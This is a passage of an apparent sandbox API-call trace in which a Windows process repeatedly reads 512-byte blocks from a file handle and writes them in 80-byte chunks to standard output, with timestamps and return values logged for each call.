lpOverlapped=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.241] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] GetFileType (hFile=0x50) returned 0x1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.243] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.243] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.244] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.244] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.246] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.247] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.249] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.249] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.251] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.251] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.252] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 